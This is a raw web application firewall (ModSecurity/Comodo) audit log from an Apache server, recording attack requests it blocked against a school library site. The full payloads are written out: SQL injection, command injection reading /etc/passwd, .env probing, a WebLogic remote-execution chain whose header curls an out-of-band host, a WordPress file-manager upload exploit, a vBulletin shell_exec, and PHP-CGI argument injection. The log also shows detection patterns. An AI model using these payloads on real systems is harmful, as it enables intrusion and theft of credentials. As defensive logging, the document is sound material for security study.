"/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748933118156317 876 (- - -) Stopwatch2: 1748933118156317 876; combined=358, p1=319, p2=0, p3=0, p4=0, p5=39, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02c2614f-Z-- --446f7d41-A-- [03/Jun/2025:15:11:32 +0700] aD6uNI0G58RZMmoh8H0q3AAAAIk 103.236.140.4 40486 103.236.140.4 8181 --446f7d41-B-- POST /cgi-bin/supportInstaller HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 83 User-Agent: MSIE Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 172017062 --446f7d41-C-- fromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0-- --446f7d41-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --446f7d41-E-- --446f7d41-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0 found within MATCHED_VAR: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: cgi-script Stopwatch: 1748938292230041 4002 (- - -) Stopwatch2: 1748938292230041 4002; combined=2319, p1=512, p2=1778, p3=0, p4=0, p5=29, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --446f7d41-Z-- --35d57625-A-- [03/Jun/2025:15:16:58 +0700] aD6vepAN5Lj366RdGMzfQQAAAMg 103.236.140.4 60960 103.236.140.4 8181 --35d57625-B-- POST /apply_sec.cgi HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id/login_pic.asp Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 95 User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Safari/605.1.15 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: uid=1234123 X-Varnish: 172050415 --35d57625-C-- html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0acat%20%2Fetc%2Fpasswd --35d57625-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --35d57625-E-- --35d57625-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /apply_sec.cgi"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748938618056293 1824 (- - -) Stopwatch2: 1748938618056293 1824; combined=631, p1=399, p2=204, p3=0, p4=0, p5=28, sr=63, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --35d57625-Z-- --dc58d771-A-- [03/Jun/2025:15:32:19 +0700] aD6zE0SujXvW2xVCZlXzjQAAAAU 103.236.140.4 34254 103.236.140.4 8181 --dc58d771-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 46.101.123.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 46.101.123.232 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --dc58d771-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc58d771-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748939539145361 824 (- - -) Stopwatch2: 1748939539145361 824; combined=328, p1=285, p2=0, p3=0, p4=0, p5=43, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc58d771-Z-- --3968db20-A-- [03/Jun/2025:15:47:55 +0700] aD62u0SujXvW2xVCZlUGCQAAAAg 103.236.140.4 36008 103.236.140.4 8181 --3968db20-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1 Accept-Charset: utf-8 --3968db20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3968db20-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748940475341326 751 (- - -) Stopwatch2: 1748940475341326 751; combined=284, p1=248, p2=0, p3=0, p4=0, p5=36, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3968db20-Z-- --a75cb422-A-- [03/Jun/2025:16:34:46 +0700] aD7BtghM7ynDNybXsoMgUgAAAEc 103.236.140.4 53918 103.236.140.4 8181 --a75cb422-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8 Accept-Charset: utf-8 --a75cb422-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a75cb422-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748943286033709 808 (- - -) Stopwatch2: 1748943286033709 808; combined=347, p1=311, p2=0, p3=0, p4=0, p5=35, sr=118, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a75cb422-Z-- --32f0fa77-A-- [03/Jun/2025:16:58:31 +0700] aD7HR0SujXvW2xVCZlV9HAAAAAE 103.236.140.4 53278 103.236.140.4 8181 --32f0fa77-B-- POST /console/css/%252e%252e%252fconsole.portal HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 1258 User-Agent: Mozilla/5.0 (Fedora; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0 Accept: */* Content-Type: application/x-www-form-urlencoded cmd: curl d0us2vpgpeonc6qdbef0mszk1tsdkirmt.oast.me X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 171296088 --32f0fa77-C-- _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread(); weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler"); field.setAccessible(true); Object obj = field.get(adapter); weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd"); String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd}; if (cmd != null) { String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req); res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result)); res.getServletOutputStream().flush(); res.getWriter().write(""); }executeThread.interrupt(); "); --32f0fa77-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --32f0fa77-E-- --32f0fa77-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\b(?:cmd(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:32){0,1}\\.exe\\b)|(?:ftp|n(?:c|et|map)|rcmd|telnet|w(?:guest|sh))\\.exe\\b)" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "60"] [id "211200"] [rev "3"] [msg "COMODO WAF: System Command Access||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: cmd.exe found within ARGS:handle: com.tangosol.coherence.mvel2.sh.shellsession(weblogic.work.executethread executethread =(weblogic.work.executethread) thread.currentthread() weblogic.work.workadapter adapter = executethread.getcurrentwork() java.lang.reflect.field field = adapter.getclass().getdeclaredfield(connectionhandler) field.setaccessible(true) object obj = field.get(adapter) weblogic.servlet.internal.servletrequestimpl req =(weblogic.servlet.internal.servletrequestimpl) obj.getclas..."] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748944711040763 7431 (- - -) Stopwatch2: 1748944711040763 7431; combined=6133, p1=344, p2=5501, p3=0, p4=0, p5=287, sr=59, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32f0fa77-Z-- --a5c7a55c-A-- [03/Jun/2025:16:58:31 +0700] aD7HR5AN5Lj366RdGMxr6AAAAM0 103.236.140.4 53372 103.236.140.4 8181 --a5c7a55c-B-- POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 608 User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Accept: */* Content-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48 X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 171568705 --a5c7a55c-C-- --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="reqid" 17457a1fe6959 --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="cmd" upload --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="target" l1_Lw --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="mtime[]" 1576045135 --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="upload[]"; filename="poc.txt" Content-Type: text/plain poc-test --------------------------ca81ac1fececda48-- --a5c7a55c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a5c7a55c-E-- --a5c7a55c-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748944711686170 3908 (- - -) Stopwatch2: 1748944711686170 3908; combined=2710, p1=433, p2=2238, p3=0, p4=0, p5=39, sr=68, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a5c7a55c-Z-- --7d73b01e-A-- [03/Jun/2025:16:58:31 +0700] aD7HR0SujXvW2xVCZlV9HQAAAAs 103.236.140.4 53368 103.236.140.4 8181 --7d73b01e-B-- POST /mifs/.;/services/LogService HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 6 User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64; rv:135.0) Gecko/20100101 Firefox/135.0 Content-Type: x-application/hessian X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 172436840 --7d73b01e-C-- cH --7d73b01e-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d73b01e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=x-application/hessian"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748944711685388 15226 (- - -) Stopwatch2: 1748944711685388 15226; combined=7901, p1=2576, p2=5254, p3=22, p4=24, p5=25, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d73b01e-Z-- --2b53c922-A-- [03/Jun/2025:16:58:32 +0700] aD7HSJAN5Lj366RdGMxr7gAAAM8 103.236.140.4 53490 103.236.140.4 8181 --2b53c922-B-- POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 140 User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 172415087 --2b53c922-C-- subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;" --2b53c922-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b53c922-E-- --2b53c922-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /ajax/render/widget_tabbedcontainer_tab_panel"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748944712679546 2438 (- - -) Stopwatch2: 1748944712679546 2438; combined=775, p1=489, p2=256, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b53c922-Z-- --03b8bb78-A-- [03/Jun/2025:17:26:24 +0700] aD7N0ESujXvW2xVCZlWftwAAABQ 103.236.140.4 41666 103.236.140.4 8181 --03b8bb78-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 206.81.12.187 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 206.81.12.187 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --03b8bb78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --03b8bb78-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748946384478903 793 (- - -) Stopwatch2: 1748946384478903 793; combined=319, p1=281, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --03b8bb78-Z-- --9efc8a28-A-- [03/Jun/2025:18:32:08 +0700] aD7dOJAN5Lj366RdGMzKCwAAAM0 103.236.140.4 34002 103.236.140.4 8181 --9efc8a28-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --9efc8a28-C-- --9efc8a28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9efc8a28-E-- --9efc8a28-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748950328117093 4339 (- - -) Stopwatch2: 1748950328117093 4339; combined=2926, p1=550, p2=2344, p3=0, p4=0, p5=32, sr=61, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9efc8a28-Z-- --ecafb32f-A-- [03/Jun/2025:18:36:12 +0700] aD7eLJAN5Lj366RdGMzN9AAAANA 103.236.140.4 49496 103.236.140.4 8181 --ecafb32f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; sdk Build/MR1) AppleWebKit/536.23 (KHTML, like Gecko) Version/4.3 Mobile Safari/536.23 Accept-Charset: utf-8 --ecafb32f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ecafb32f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748950572804793 769 (- - -) Stopwatch2: 1748950572804793 769; combined=299, p1=261, p2=0, p3=0, p4=0, p5=38, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ecafb32f-Z-- --154deb3a-A-- [03/Jun/2025:18:36:19 +0700] aD7eM0SujXvW2xVCZlXk5QAAABQ 103.236.140.4 49930 103.236.140.4 8181 --154deb3a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 OPR/62.0.3331.116 Accept-Charset: utf-8 --154deb3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --154deb3a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748950579825793 1000 (- - -) Stopwatch2: 1748950579825793 1000; combined=380, p1=340, p2=0, p3=0, p4=0, p5=40, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --154deb3a-Z-- --6cf84819-A-- [03/Jun/2025:18:39:07 +0700] aD7e240G58RZMmoh8H0BeQAAAIc 103.236.140.4 60148 103.236.140.4 8181 --6cf84819-B-- GET /.c9/metadata/environment/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8 Accept-Charset: utf-8 --6cf84819-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6cf84819-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748950747644980 930 (- - -) Stopwatch2: 1748950747644980 930; combined=430, p1=387, p2=0, p3=0, p4=0, p5=43, sr=136, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6cf84819-Z-- --a86dc46b-A-- [03/Jun/2025:18:40:32 +0700] aD7fMESujXvW2xVCZlXoQgAAAAo 103.236.140.4 37024 103.236.140.4 8181 --a86dc46b-B-- GET /storage/logs/laravel.log HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.28 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1 Accept-Charset: utf-8 --a86dc46b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a86dc46b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748950832167503 2241 (- - -) Stopwatch2: 1748950832167503 2241; combined=833, p1=358, p2=450, p3=0, p4=0, p5=24, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" 